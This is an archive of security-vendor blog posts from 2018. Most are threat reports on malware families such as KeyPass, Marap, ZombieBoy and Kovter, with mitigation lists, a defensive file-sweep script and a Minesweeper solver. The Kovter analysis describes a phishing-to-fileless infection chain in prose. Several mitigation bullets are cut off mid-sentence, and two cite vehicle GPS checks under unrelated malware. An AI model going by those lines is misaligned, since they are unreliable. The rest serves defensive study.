In August 2018, a new ransomware variant, KeyPass, gained traction using new techniques such as a manual-control mode that lets the operator customize its encryption process. Researchers at Kaspersky Lab say that the trojan is being propagated by means of fake installers that download the ransomware module. The trojan sample is written in C++ and compiled in MS Visual Studio, using the MFC, Boost and Crypto++ libraries. The PE header contains a recent compilation date.

Security researchers at Proofpoint recently discovered a new malware strain dubbed Marap. The malware is being distributed via spam emails containing malicious attachments. Based on the campaign’s pattern, Proofpoint linked it to Necurs. Marap can be used to download other malware. Bleeping Computer states that Marap infects victims, fingerprints their systems, and sends this information back to a central command and control (C&C) server.

Malware: KeyPass Ransomware

KeyPass enumerates local drives and network shares accessible from the infected machine and searches for all files, regardless of extension. Many ransomware families hunt documents with specific extensions, but this one skips only a few folders. Every encrypted file gets an additional extension, “.KEYPASS”, and ransom notes named “!!! KEYPASS_DECRYPTION_INFO!!!.txt” are saved in each processed directory. In just 36 hours, from the evening of August 8 to August 10, the ransomware cropped up in more than 20 countries. Brazil and Vietnam were the hardest hit, but it claimed victims in Europe and Africa as well.


Some Mitigation Strategies:

  • File Integrity Monitoring (FIM) to alert on the appearance of .KEYPASS files or the ransom note .txt
  • Intrusion detection systems (IDS) would detect additional payload downloads
  • A solid Backup strategy for easy restore as not to disrupt business operations
  • 24x7 Security Monitoring for malicious behavior and immediate incident response
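The report gives two filesystem artifacts for KeyPass: every encrypted file gains a ".KEYPASS" extension on top of its original name, and a note named "!!! KEYPASS_DECRYPTION_INFO!!!.txt" lands in each processed directory. The following is an added example of a sweep for both, for scoping an incident across local drives and shares; it is not code from the original report or from Kaspersky. The extension and note name are parameters, so the same sweep works for any family with a known pair, which goes beyond the KeyPass case the report describes. The directory tree in the demo is constructed in a temporary directory.

```python
"""Post-incident sweep for KeyPass artifacts on local drives and network shares.

Added example (not from the original report). The scanned tree is constructed.
"""
import os
import tempfile

KEYPASS_EXT = ".KEYPASS"
KEYPASS_NOTE = "!!! KEYPASS_DECRYPTION_INFO!!!.txt"


def sweep(root: str, ext: str = KEYPASS_EXT, note: str = KEYPASS_NOTE) -> dict:
    """Walk root and report which directories carry encrypted files or ransom notes."""
    dirs = {}
    for dirpath, _dirs, files in os.walk(root):
        # Case-insensitive on the extension: Windows shares do not preserve case reliably.
        encrypted = sorted(f for f in files if f.upper().endswith(ext.upper()))
        has_note = note in files
        if encrypted or has_note:
            rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
            dirs[rel] = {
                "encrypted": encrypted,
                "note": has_note,
                # Original names survive because the extension is appended, not replaced,
                # which is what makes a restore-from-backup list easy to produce.
                "originals": [f[: -len(ext)] for f in encrypted],
            }
    return {
        "hit_dirs": sorted(dirs),
        "encrypted_total": sum(len(v["encrypted"]) for v in dirs.values()),
        "notes_total": sum(1 for v in dirs.values() if v["note"]),
        "details": dirs,
    }


def _touch(root: str, rel: str, text: str = "") -> None:
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(text)


def demo() -> dict:
    """Constructed tree: two hit directories (one without a note) and one clean one."""
    root = tempfile.mkdtemp(prefix="share-")
    _touch(root, "finance/q2.xlsx.KEYPASS")
    _touch(root, "finance/budget.docx.KEYPASS")
    _touch(root, "finance/" + KEYPASS_NOTE, "contact us to decrypt\n")
    _touch(root, "hr/handbook.pdf.keypass")      # case differs; still counted
    _touch(root, "clean/readme.txt", "nothing to see\n")
    return sweep(root)


if __name__ == "__main__":
    report = demo()
    print(report["hit_dirs"], report["encrypted_total"], report["notes_total"])
```

This is a scoping aid after the fact, not prevention: by the time the extension shows up the file is already gone, and the "originals" list is there to drive the restore from backup that the mitigation list above relies on. Run it with read-only credentials from a clean host, and point it at shares first, since those are where a single infected workstation does the most damage.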

Malware: Marap

As for the malspam campaigns pushing the new Marap downloader, Proofpoint says it has observed various versions. Researchers have seen campaigns leveraging .IQY files, PDF documents with embedded IQY files, password-protected ZIP archives, and the classic Word documents with embedded macros. The malware also has basic features to detect the virtual machines used for malware analysis, though they are not as sophisticated as those in other malware.



Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for communication to the C2 network over HTTP
  • Web filter to block the outgoing HTTP traffic
  • Email filtration to find malicious attachments related to Marap
  • File Integrity Monitoring (FIM) looking for the downloaded .zip file containing a .iqy file or MS Word doc with macros
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Thinking About Your Cybersecurity Program

on August 21, 2018

The National Institute of Standards and Technology, or NIST, was tasked with developing a framework that could be used to understand and manage cybersecurity defenses. So, in good government fashion, they came up with a 56-page document full of dense text and tables and so on. But, and this is the important part, they summarized it into 5 functions, each a different high-level action step. That provides a good jumping-off place to start thinking about a cybersecurity program for your business.

We’ve come up with 20 questions, none of them really technical, that can help you start or accelerate the development of your cybersecurity defenses. As you think through these questions, a framework that fits your business should start to emerge.

Identify cybersecurity threats

  • What are your highest value assets?
  • What assets may be valuable to others?
  • Who would be interested in your assets, and why?
  • How could an adversary steal or compromise those assets?

Protect the system

  • How do you manage users’ activity?
  • How do you protect your data and digital assets?
  • How do you protect your network?
  • How do you protect your endpoint devices?

Detect threats in a timely manner

  • What needs to be monitored?
  • How will you monitor it?
  • Who will be accountable for monitoring?
  • How is a detected threat handled?

Respond to detected threats

  • How are threats assessed?
  • How do you determine the impacts?
  • What plans are in place to respond?
  • Are there physical assets that could be impacted?

Recover from an incident

  • How will you recover lost or compromised assets?
  • Have you made a recovery plan, and has it been tested?
  • Who will be accountable for recovery?
  • How will internal and external communications be handled?

If you address these broad questions in terms of people, process, and technology, you will get a pretty clear picture of your situation. Some answers may be more people- or technology-focused, but keep all three facets in mind for each answer.

This is a great way to build a basic cybersecurity program. Start by answering the questions for the way things are now. Some gaps will show up, they always do, and you can use those gaps to determine the most important things to work on and how to improve.

And if you want to skip right to the sleep-aid section of the NIST Cybersecurity Framework, here’s a link to the full document: NIST. There is a lot more to the whole framework, and I hope to post more about how to make it effective in the real world of never enough time or resources, but that means I will need time and resources.

Threat Report Thursday August 16th 2018

on August 16, 2018

New ZombieBoy cryptominer discovered. Security researcher James Quinn has recently discovered a new Monero miner worm that appears to amass $1,000 per month and uses multiple exploits to avoid detection. Unlike the MassMiner cryptocurrency miner, ZombieBoy leverages WinEggDrop instead of Masscan to search for new hosts to infect. Secondly, security researchers at Check Point revealed at DEF CON 26 that a cyber criminal can infiltrate a network through a vulnerability in a fax machine protocol. Using only a fax number, an all-in-one printer-fax machine can be penetrated through Faxploit to gain access to the network. An attacker only needs to send a malicious fax to a vulnerable fax machine to get in. Researchers note that attackers can then steal printed documents, mine Bitcoin, or do practically anything else they can think of.

Malware: ZombieBoy cryptominer

The tool also utilizes the DoublePulsar and EternalBlue exploits to remotely install the main DLL. Quinn states that the 64.exe module downloaded by ZombieBoy uses the DoublePulsar exploit to install both an SMB backdoor and an RDP backdoor. According to Quinn’s findings, ZombieBoy is being updated on a daily basis, and the malware will not run if it detects a virtual machine environment, hampering researchers’ ability to reverse engineer and analyze it. The miner uses Simplified Chinese, indicating that the author may be Chinese.


Some Mitigation Strategies:
- File Integrity Monitoring (FIM) to detect the download of malicious .dll files
- Intrusion detection systems (IDS) to detect the SMB exploitation traffic (EternalBlue/DoublePulsar) it uses to spread
- Web filtration to block or alert on outbound communication to posthash/
- 24x7 Security Monitoring for malicious behavior and immediate incident response

Vulnerability: Faxploit (fax machine protocol)

Every device reachable from the fax-printer’s network, such as servers, routers, workstations, laptops, or mobile devices, would be exposed to the attack. Check Point collaborated with HP and used an HP Officejet Pro 6830 all-in-one printer as a test case. From the compromised printer they were able to use EternalBlue to exploit PCs on the network, and exfiltrated data by sending it back out as a fax. Researchers worked with HP to provide a patch, which was rolled out as an automatic update to customers. Researchers advise checking for available firmware updates and disconnecting the PSTN line from the fax machine if it is not in use.



Some Mitigation Strategies:
- Segment office equipment onto its own network segment so its traffic is easy to monitor
- Intrusion detection systems (IDS) to monitor for SMB exploitation attempts originating from the fax machine
- Use NetFlow to monitor outbound traffic from your office equipment
- 24x7 Security Monitoring for malicious behavior and immediate incident response

Threat Report Thursday August 9th 2018

on August 9, 2018

Security researchers at Proofpoint have uncovered Dreambot, a new variant of the Ursnif banking Trojan. Though it is still in development, it has been seen spreading since July 2016 through exploit kits such as Neutrino, through phishing emails with malicious attachments, and through malvertising. Secondly, Palo Alto Networks researchers discovered a threat group named DarkHydrus carrying out credential harvesting attacks using weaponized Word documents, delivered via spear-phishing emails to government and educational institutions in the Middle East. Based on the analysis, DarkHydrus used the open-source Phishery tool to host the command and control server that harvests credentials. The use of Phishery further illustrates DarkHydrus’ reliance on open-source tools to conduct its operations.

Malware: Dreambot

Researchers point out that this new variant has new capabilities, including peer-to-peer (P2P) functionality and Tor communication. The Tor-enabled versions are hard to detect because their communications are encrypted and anonymized.


Some Mitigation Strategies:

  • File Integrity Monitoring (FIM) to monitor for the download of a zipped JavaScript
  • Intrusion detection systems (IDS) to detect peer-to-peer communications
  • Intrusion detection systems (IDS) would
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: DarkHydrus

Two Word documents using the domain to harvest credentials were found. These related Word documents were first seen in September and November 2017, which suggests that DarkHydrus has been carrying out this credential harvesting campaign for almost a year.



Some Mitigation Strategies:

  • Web filtration to block
  • Email filtration to detect spear phishing attempts using Word files
  • File Integrity Monitoring (FIM) to monitor for downloaded malicious Word documents
  • Intrusion detection systems (IDS) to monitor for malicious queries through DNS
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Perch Security Dashboard Overview

on August 7, 2018

We all need a snapshot of what's happening before we delve in. Perch Security CISO Wes Spencer shows off Perch's Dashboard, which gives users exactly that.

Threat Report Wednesday August 1st 2018

on August 1, 2018

According to Trend Micro, a new exploit kit, Underminer, contains features that make it difficult for researchers to track it and reverse engineer its payloads. Trend Micro researchers state that the exploit kit is currently being used against victims in Asian countries, primarily users in Japan. Underminer delivers a bootkit that infects system boot sectors as well as Hidden Mellifera (Hidden Bee), a cryptocurrency-mining malware. Trend Micro researchers first observed the exploit kit on July 17, 2018. Also this week, security researchers at McAfee Labs have identified an increasing number of actors using fileless attacks. These attacks don’t drop malware on the system; rather, they use the tools already installed on it. Researchers note that one fileless threat, CactusTorch, uses the “DotNetToJScript” technique to execute custom shellcode on Windows systems straight from memory.

Malware: Underminer

Underminer is capable of browser profiling and filtering, preventing client revisits, URL randomization, and asymmetric encryption of payloads. Malware is transferred via an encrypted transmission control protocol (TCP) tunnel and packaged in a customized file format (much like the ROM file system format), which makes analysis difficult for researchers. Underminer has been observed exploiting three major vulnerabilities: CVE-2015-5119, CVE-2016-0189, and CVE-2018-4878.


Some Mitigation Strategies:

  • File Integrity Monitoring (FIM) to monitor for the creation of files and scripts
  • Intrusion detection systems (IDS) to detect C2 communication for additional payloads
  • Web filtration to detect the use of malicious URLs or unknown sites
  • 24x7 Security Monitoring for malicious behavior and immediate incident response.

Technique: DotNetToJScript (CactusTorch)

DotNetToJScript doesn’t write any .NET assemblies to disk, which leads security software to often fail to detect this type of attack. CactusTorch loads and executes malicious .NET assemblies, the smallest unit of deployment for a .NET application, straight from memory. Corporate networks and single users alike are vulnerable to this type of attack. McAfee states that its Endpoint Security (ENS) and Host Intrusion Prevention System (HIPS) clients protect against this type of fileless attack.



Some Mitigation Strategies:

  • File Integrity Management (FIM) to monitor for wscript.exe, which is the only file created
  • Intrusion detection systems (IDS) to monitor for malicious outbound communication
  • 24x7 Security Monitoring to check for GPS consistency with locations of vehicles

What we're gonna do right here is go back, wayback...

on July 29, 2018

In 2012 I started dabbling with CMSs. As a Front End Developer whose backend expertise is dropping tables, making a site with tons of features out of the box was glorious, but the hindrance of using a CMS that no one tells you about (and that you ignore) is the constant updating and how vulnerable they are to hacks.

Because of this (version control anyone? and many other reasons) I stopped using CMSs, but I still had a few sites I no longer updated running on a CMS (no, it’s not WordPress 💩). Anyways, recently said CMS got hacked, and since I didn’t keep the CMS up to date my sites were affected by said hack 😑.

Since I value my videogaming time, I updated the CMS hoping that would make the problem go away quickly (it didn’t 🙄), so now I had to invest some time to fix the issue (bye bye videogames 🤬).

I downloaded my site files, backed up the database and scanned the files with an antivirus, and it was going to be impossibly time consuming to fix since the site had a ton of 💩 PHP files that were infected with malicious code. (Hackers: 1 Ben: 0)

Since my last backup was non-existent 🤦‍ lost to data corruption 😉, I was faced with deciding to either decommission the sites or find a way to fix them.

Going back

I decided I was not going to let the Hackers win but I didn’t have any usable source files, so what to do? 🤔 Enter the waybackmachine or as I call it my backup solution 😂.

The waybackmachine had a few snapshots of my site 😬, so now it was a matter of finding a way to get hold of one of the snapshots and I would have the static source files of my site. After a bit of googling I found that Github user hartator (you da real MVP son 🙌) made the wayback-machine-downloader, a small Ruby app that can download waybackmachine snapshots.

Now I was faced with another problem: do I really wanna install 💩 Ruby to do this? NOPE. Luckily the wayback-machine-downloader has a Dockerfile, which means I can just run this app in a Docker container and get my site files 👌, which is what I ended up doing.


Wayback-Machine-Downloader in action

The wayback-machine-downloader worked flawlessly. With a working copy of my static site files I could get my site working again (Hackers: 1 Ben: 1), but no, I had already missed my gaming session and invested too much time, so I figured let’s go one step further and fix it for good by porting the site to my preferred static site generator, Hugo.

Hugo All The Things Sites

Since I already have Hugo installed on my computer (if you don’t, read here), I just needed to create a new Hugo site by running this command in my terminal:

hugo new site mySiteName

Once the site was generated I had to create a theme for my site, which I did by running the command:

hugo new theme myThemeName

This generates all the files necessary to theme your site, so now all that was left to do was getting my static files into Hugo theme partials.

Hugo Generated Theme Partials

So once I’m done copying over my HTML to the partials and run my site locally, I am greeted by this:

Close But No Cigar

Upon further inspection using my browser’s dev tools ❤️ we can see we have a few broken asset links. No big deal: since we are using the files we downloaded with the wayback-machine-downloader and copied the HTML markup into Hugo, which has a different file structure than the files we downloaded, we need to fix the paths to our assets in Hugo.

Browser Dev Tools

Apparently the red sea was full of console errors

After using our dev tools we know the problem is our file references: in our old files they were under an assets folder, whereas Hugo keeps all its static assets in a static folder.

So in our old files the references were something like this:


Now in Hugo they become this:


So I ran a search in all the files to see how bad it was, and the results were a mere 1229 occurrences in 226 files 😮. Yeah, good thing our code editor has a nifty Replace in Files function 😏.

Replace in Files

VSCode Replace in Files

So after running the Replace In Files function for each of our broken assets, now my site looks something like this:

Fixed Assets

Fixed assets, such cool, much wow 😎

So at this point I was more than happy. Now I had to start making content pages in Hugo and copying the content of each page into its own .md (Markdown) file. Luckily this particular site only had 16 articles, so I decided to do this manually; otherwise I would’ve probably reached out to our resident Hulk genius Zach to help me come up with some clever way of accomplishing this. (Hackers: 1 Ben: 2)

After creating all my content pages I started navigating the site locally and noticed the links were not the same as they were on the old site. No bueno, as I would have to make 301 redirects for every page in order to avoid affecting my Google page rank. (Hackers: 1 Ben: 1) 😑

I told you guys Hugo was awesome, right? I was not about to do 301 redirects for 16 pages; thankfully Hugo has a thing called permalinks. By adding a permalink to my Hugo config.toml I can solve this issue with a single line of code 😬. All I had to do was match the permalink to the same URL pattern of YYYY/MM/DD/Title I used in the old CMS (Hackers: 1 Ben: 2) 😜. Here’s what that looks like:

      # config.toml: the pattern lives under the [permalinks] table
      [permalinks]
        blog = "blog/:year/:month/:day/:title/"

After applying the permalink and testing everything locally, the site was once again ready to go live. I used these instructions on how to host a Hugo site on Gitlab ❤️ and these instructions on how to use a custom domain on Gitlab Pages with CloudFlare certificates. So now my site is out of a CMS, is version controlled in Gitlab, has CI/CD and is hosted for FREE. (Hackers: 1 Ben: 3) 🎉

So that was my weekend without videogames 😭, I hope yours was better ✌️.

Release Notes

July 27, 2018

  • Added API support for MSSPs and upcoming SLA management
  • Added a new Organization Settings ( Beta )
  • Added specialized rule files for Tiny Form Factor sensors
  • Updated the Escalated Alerts color to a friendlier shade of yellow

  • Fixed a bug when joining communities during the sign up process
  • Fixed a bug with firewall blacklist options on the Alerts ( Beta ) suppression modal
  • Fixed a bug with IPs not populating in the Alerts ( Beta ) False Positive Modal

  • Removed deprecated API endpoints for rule files
  • Updated weekly emails to use an improved, automated process

If we’re gonna get fuzzy, let’s be discrete - Up close and personal with a Minesweeper solver

on July 24, 2018

In 1992, Microsoft released Minesweeper alongside Windows 3.1. We can only imagine the purpose Microsoft originally intended, but most of us know Minesweeper as the worst Cookie Clicker clone ever designed. We’d fire it up and click all over the board until the smiley face turned sad (and dead). Sometimes we’d get pretty far; sometimes wide swaths of the board opened up, and we knew we were probably some kind of genius, fated to discover new physics, or a way to recycle sewage into edible food. Well, until sad face appeared again, boredom grew to disdain, and Chip’s Challenge twinkled its eyes at ya.

Minesweeper 1

I grew to love Minesweeper in my final year of grade school. Because I’d fallen deep into computers from a young age, my high school, hesitating not a single second seizing opportunities to hire less IT staff to foster curiosity, assigned half my day to PC Support, where on occasion I’d be asked to fix a computer. Otherwise, I played a lot of Minesweeper. (And, of course, those LAN multiplayer Halo and Quake 3 demos #millennials)

The rules of Minesweeper are pretty simple. At the start of the game, the board contains a number of mines – this number is displayed prominently. Each cell either contains a mine, or doesn’t. When you click a cell, it reveals either a mine, in which case:

You Lose

Or it can reveal a number (or many numbers). The number represents how many direct neighbors contain a mine, no more, no less. If you click all the cells not containing a mine, you win. That’s all. The rest is icing – such as right-clicking to flag a cell as a mine, which doesn’t contribute to winning or losing at all, and purely aids the player. Enough talk – more pretty pictures. Well, more pictures, at least.

Minesweeper 2 Minesweeper 3

In the first picture, there is a number 1 which has only a single neighbour. By the rules of the game, this neighbour must contain a mine. We flag it, so we remember not to click it.

That was the only place where the obvious choice of action is derived entirely from a single number. We’ve gotta get clever to continue. And so we shall!

Numbers that share neighbours also share information – like, if neighbour X is a mine, it may mean neighbours Y and Z cannot contain mines, and are safe for the clicking. Which, you guessed it, we can take advantage of.

Minesweeper 4

The topmost number 1 touches both neighbours highlighted in blue. Since this #1 means only one of its neighbours has a mine, we can infer that if we knew the location of the mine, the other neighbours could safely be clicked. The same applies to the 1 below it at (2, 1), whose neighbours are highlighted in orange.

See the single orange neighbour not overlapped by the blue? If we were to assume a mine was there, it would mean those two blue neighbours contained 0 mines, safe for the clicking. So we click them. Now the topmost #1 touches no cells, leaving no place for its single mine. Of course, this means the #1 pops out of existence, appearing spontaneously in the bank account balance of some fortunate soul (or Shia LaBeouf’s, setting off a chain of events culminating in the attempted assassination of the US president). Or, we end up clicking a mine and losing the game. It all depends on how strange you believe the universe is.

For the sake of the exposition, we’ll adhere to Occam’s razor, and assume clicking both of the blue-shaded cells leads to certain death. Since we’re forced to click both blues if we flag the orange, we know we can’t flag it without certainly dying. We’ve gotta do the other thing… what was it? …uh, Clicking? Yeah.

Minesweeper 5

This same logic can lead us to flagging a cell, instead of clicking.

Minesweeper 6 Minesweeper 7

Taking it one step further, we can combine information from multiple cells to expose less obvious solutions. In the next example, the #1’s at the bottom left portion touch all but a single neighbour of the #3. We know both of those #1’s combined provide two mines, leaving one mine of #3 unaccounted for. We infer the mine’s location must be in the only neighbour #3 doesn’t share with the #1’s.

Note: cells shaded blue have been right-clicked, and red-shaded cells have been left-clicked.

Minesweeper 8

Using only this rule, we can get pretty far. Much of the time, a single move can open up the board.

Minesweeper 9

That is, until those moves run out.

Well, there is one other general strategy we missed. Our previous strategies relied on one number completely containing all the neighbours of another number. There are some cases where only partial overlap is decisive enough to uncover Deep Truths™ of the board.

Minesweeper 10 Minesweeper 11 Minesweeper 12

The three blue-shaded cells contain exactly one mine. Another way of putting it is: the blue-shaded cells contain a maximum of one mine. This is true, even for the cells overlapping the green – since there is a maximum of one mine, we can effectively treat the two overlappers as a single cell. This leaves only one other place for green’s remaining mine: the bottommost greenie. We flag it, and the board opens up again… at least for a bit.

Minesweeper 13

And then there were no more strategies. Finito. Good day, sir!

Well, of course, no more strategies except for the other ones, which we’ll take a look at next time, before finally accepting the futility of our situation and grasping at straws to milk the board for all she’s worth.
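The three rules walked through above, as an added example that is not part of the original post: a small Python deducer over a text board (digits are revealed numbers, "." a revealed empty cell, "?" covered, "F" flagged), with constructed boards that reproduce the lone-neighbour 1, the blue/orange subset case and the "at most one mine in the blue" overlap case. The overlap rule is implemented in its general form (bounds on the mines the shared cells can hold), of which the subset rule is the special case.

```python
from itertools import product

UNKNOWN, FLAG = "?", "F"   # covered cell / cell the player has right-clicked (flagged)


def neighbours(r, c, rows, cols):
    """Yield the up to eight cells around (r, c) that lie inside the board."""
    for dr, dc in product((-1, 0, 1), repeat=2):
        if (dr or dc) and 0 <= r + dr < rows and 0 <= c + dc < cols:
            yield (r + dr, c + dc)


def constraints(board):
    """Turn each revealed number into (its covered neighbours, mines still to place among them).

    board is a list of equal-length strings: a digit is a revealed number, '.' a revealed
    empty cell, '?' a covered cell and 'F' a flag. A flag already explains part of the
    number, so it is subtracted, exactly as the player does when reading the board.
    """
    rows, cols = len(board), len(board[0])
    out = []
    for r, c in product(range(rows), range(cols)):
        if not board[r][c].isdigit():
            continue
        around = list(neighbours(r, c, rows, cols))
        covered = frozenset(n for n in around if board[n[0]][n[1]] == UNKNOWN)
        flagged = sum(board[n[0]][n[1]] == FLAG for n in around)
        if covered:
            out.append((covered, int(board[r][c]) - flagged))
    return out


def deduce(board, partial=True):
    """One pass of the post's rules; returns (cells safe to click, cells that are mines).

    1. A number with 0 mines left has only safe neighbours; one with as many mines left as
       covered neighbours (the lone-neighbour 1) has only mines.
    2. If A's covered cells all lie inside B's, the cells B has beyond A hold exactly
       B - A mines (the blue/orange example, and the #1s that box in the #3).
    3. If A and B merely overlap, the overlap holds between max(0, A - |A only|) and
       min(A, |overlap|) mines, which bounds what is left for B's other cells (the
       "blue holds at most one mine" example). Rule 2 is rule 3 with |A only| = 0, so
       both use the same bounds; partial=False keeps only the subset case.
    """
    cons = constraints(board)
    safe, mines = set(), set()
    for cells, n in cons:
        if n == 0:
            safe |= cells
        elif n == len(cells):
            mines |= cells
    for (a, na), (b, nb) in product(cons, repeat=2):
        overlap, a_only, b_only = a & b, a - b, b - a
        if a == b or not overlap or not b_only or (not partial and a_only):
            continue
        lo = max(0, na - len(a_only))   # fewest mines the overlap can hold
        hi = min(na, len(overlap))      # most mines the overlap can hold
        if nb - hi == len(b_only):      # overlap full and B still needs every other cell
            mines |= b_only
        if nb - lo == 0:                # overlap alone can satisfy B: the rest is safe
            safe |= b_only
    return safe, mines


# Constructed boards (not the post's screenshots), one per rule. Row 0 is the top.
LONE = ["?1.",
        "11.",
        "..."]          # rule 1: the 1s see a single covered cell, so it is a mine
SUBSET = [".1?",
          ".1?",
          ".1?"]        # rule 2: the top and bottom 1s sit inside the middle 1's cells
OVERLAP = ["????",
           "1121",
           "...."]      # rule 3: the 1 at (1,1) and the 2 at (1,2) share two covered cells
FLAGGED = ["F1?",
           "11?"]       # a flag already accounts for each 1, so the rest is safe


if __name__ == "__main__":
    for name, board in [("LONE", LONE), ("SUBSET", SUBSET), ("OVERLAP", OVERLAP), ("FLAGGED", FLAGGED)]:
        safe, mines = deduce(board)
        print(f"{name}: click {sorted(safe)} flag {sorted(mines)}")
```

On OVERLAP the subset rule alone finds only (0, 2) safe and (0, 1) a mine; the general bounds add (0, 3) as a mine and (0, 0) as safe, which is the board-opening move the post describes.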

Bonus win gif for you beautiful readers.

Minesweeper 14

Threat Report Tuesday July 23rd 2018

on July 23, 2018

In this week’s report, we are covering two very malicious programs. Security researchers at Kaspersky Labs have discovered the Calisto malware, which appears to be a precursor of the Proton macOS malware. Researchers found that Calisto was uploaded to VirusTotal in 2016, but remained unnoticed until May 2018. This macOS malware is a backdoor that disguises itself as Intego’s Mac Internet Security and asks for the user’s login and password upon installation. It enables the attacker to remotely access the system: enabling remote login and screen sharing, configuring remote login permissions, and enabling a hidden “root” account in macOS with a designated password. The second interesting piece of code is a decrypter for the Magniber ransomware that has recently been released. South Korean cybersecurity firm AhnLab created decrypters for some versions of the Magniber ransomware. Magniber, which targets only South Korean end users, was deployed by the Magnitude Exploit Kit as early as October 2017 through malvertisements. Since malvertising is a constant threat on the internet, it is possible to see this spread to other financial institutions.

Malware: Calisto Malware

Interestingly, researchers found that macOS systems with SIP (System Integrity Protection) enabled prevent full damage from the Calisto malware even if it has root permissions. Researchers say that Calisto was created before Apple released the SIP security feature. Researchers still have no information as of now on how the malware propagates. Mac users should be safe from this malware as long as they enable SIP, update the OS to the current version, download only from trusted sources, and use credible antivirus software.

For more information:
Sentinel One
Xuanwu Lab

Some Mitigation Strategies:

  • File Integrity Management (FIM) to monitor for the creation of files related to the RAT
  • Intrusion detection systems (IDS) would detect communication C2 for additional payloads
  • Web Filtration would detect the use of malicious URLs or unknown sites
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: CVE-2016-0189

Magnitude exploits vulnerabilities concerning memory corruption (CVE-2016-0189) in Internet Explorer. The ransomware is one of the few country- or language-specific ransomware that has been created. As of March 30, affected users can download the decrypter at AhnLab’s website, which website creators state is updated daily.

For more information:
Bleeping Computer

Some Mitigation Strategies:

  • File Integrity Management (FIM) to monitor for the creation of files related to ransomware
  • Intrusion detection systems (IDS) to monitor for malicious communication to C2s
  • Solid Backup strategy to restore from when machine is infected and encrypted
  • 24x7 Security Monitoring to check for GPS consistency with locations of vehicles

Kovter Research and Analysis

on July 19, 2018

Through recent alert analysis, Perch Labs has identified Kovter as malicious code on the rise since January. To truly understand the code, we need to understand its history:

  • Kovter, in 2013, was known as a piece of silent ransomware code that transferred files to an infected host without detection. Throughout 2013 and 2014, it was an effective ransomware that would wait on a system until a certain function was performed. One of those functions was a popup screen notifying the user of illegal activity, with an interface provided to pay a fine, now known as a ransom.
  • Kovter then evolved into many click fraud campaigns. It would infect hosts and send stolen data to a well-architected Command and Control (C2) server architecture.
  • In 2015, Kovter evolved into one of the first fileless pieces of malicious code to utilize autorun registry edits. It would embed a JavaScript function into the registry that executes a PowerShell script, which then installs multiple binaries.
  • As Kovter continued to evolve, it added to its fileless capabilities by including file-like components and spawning local shells to spread laterally throughout your network.

The Kovter family of malicious code has a tradition of being effective and difficult to detect. The most common attack vector for Kovter has been spam and targeted phishing email campaigns. Spam and phishing emails using false delivery notifications for UPS, FedEx or invoices are nothing new, but they are still incredibly effective, especially when well researched and targeted. The main variants of Kovter are aimed at performing ad fraud and are difficult to detect and remove, as they implement these fileless infection methods. They can steal personal or corporate information, download additional malware or have complete access to the infected host.

Kovter Methodologies

1. Attack the Human
Kovter arrives within mail attachments as a macro in an Office file. When activated, the macro downloads additional files that trigger a PowerShell command stored in the registry to gain full control of the host. Then the randomly named file deletes itself. One of the most recent campaigns used an effective technique to trick users with fake delivery notifications from UPS, USPS, and FedEx. The emails have historically targeted Finance and HR departments through documents those departments handle, such as resumes and invoices. The email attachment is either a ZIP file that archives a double-extension file (*.doc.html) or a standalone double-extension HTML file.

2. Extract, Decode and Run
Phishing, if targeted, is successful because of the research done on the company or individuals. Malicious actors will troll LinkedIn to identify key employees or easy targets. They then troll social media to evaluate likes and dislikes to help craft an email based on the data found. The HTML document will convince the user to click and download an “Office plugin,” but in the background, the HTML actually contains an embedded base64-encoded ZIP file.

3. Install Malicious javascript
When executed, the HTML extracts a JS file (WebView-Plugin-Update-0.exe.js), a partially obfuscated JScript/JavaScript file hiding inside a 7-zip archive. Once connected, the fake WebView Plugin downloads a JS file and immediately executes it after a de-obfuscation process.

4. Connect to C2 for additional payloads
The file, once properly decoded, will again try to build different URLs using different domain names. There will be two possible URLs from each domain. The first URL will download something from the ransomware or spyware family and the second URL will download KOVTER. Both URLs will download a file with a *.PNG extension that will be renamed to *.EXE and executed later. There are layers of obfuscated files and multiple command and control sites.

5. Connect to new C2 to test file storage
The malicious code will now attempt to communicate with the C2 servers that have been architected to store stolen assets from the infected hosts. Once communication is established there is a process that schedules regular connections to upload any data that the infected host has collected.

Strategy for Detection and Prevention

Due to its arrival via spam mail, your organization should consider setting up anti-spam filters that can block malicious emails before they even reach the end user. Also, implement web filtration that may detect communication with a C2 website.

1. Log Management
Log messages are a very useful tool for a variety of security tasks, but simply collecting logs locally in text files is often not enough. With tools like syslog-ng, security experts can centralize all of the log messages coming from servers, network devices, applications and lots of other sources (even printers and peripherals). With central log collection, one can easily check log messages even if the source machine suffered a hardware failure or logs were removed during a security incident. And once all of the logs are centralized, you can do interesting things like filter the messages, getting rid of the ones you don’t want, or classify messages so that you can group similar messages together. There are a few steps to follow to maintain an efficient and effective logging process:

  • Set a strategy – don’t log blindly
  • Structure your log data, and consider the format of your logs
  • Separate and centralize your log data
  • Practice end-to-end logging
  • Correlate data sources
  • Use unique identifiers
  • Add context
  • Perform real-time monitoring

2. File Integrity Management
Organizations can also build detection around commands known to be used by malicious PowerShell scripts, looking for the patterns used to obfuscate their command lines. Files dropped by the malware described above will, once loaded, be detected through their file loads; this is another observable that an FIM solution can detect.

3. Intrusion Detection and Netflow
An intrusion detection system (IDS) is a system that monitors network traffic for suspicious activity and issues alerts when such activity is discovered. While anomaly detection and reporting is the primary function, some intrusion detection systems are capable of taking actions when malicious activity or anomalous traffic is detected, including blocking traffic sent from suspicious IP addresses.

4. Solid Threat Intelligence

5. 24x7 Monitoring of indicators like the IP address below
In cyber threat intelligence, analysis often hinges on the triad of actors, intent, and capability; with consideration given to their tactics, techniques, and procedures (TTPs), motivations, and access to the intended targets. Studying this triad enables us to make informed, strategic, operational, and tactical assessments.


Recorded Future – Kovter ID Card
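Detection logic for the delivery chain in steps 1 to 4 and the registry-autorun persistence described in the history list, as an added example (not Perch’s or Recorded Future’s code). Every sample here is constructed for the demonstration: the attachment names, the base64 ZIP inside the “Office plugin” page, the MZ bytes served under a .png name and the Run-key values are not real Kovter artefacts, and the extension lists and command-line tells are assumptions to tune per environment.

```python
import base64
import io
import re
import zipfile

# Double extensions seen in the chain: a document-looking decoy in front of a script/HTML type
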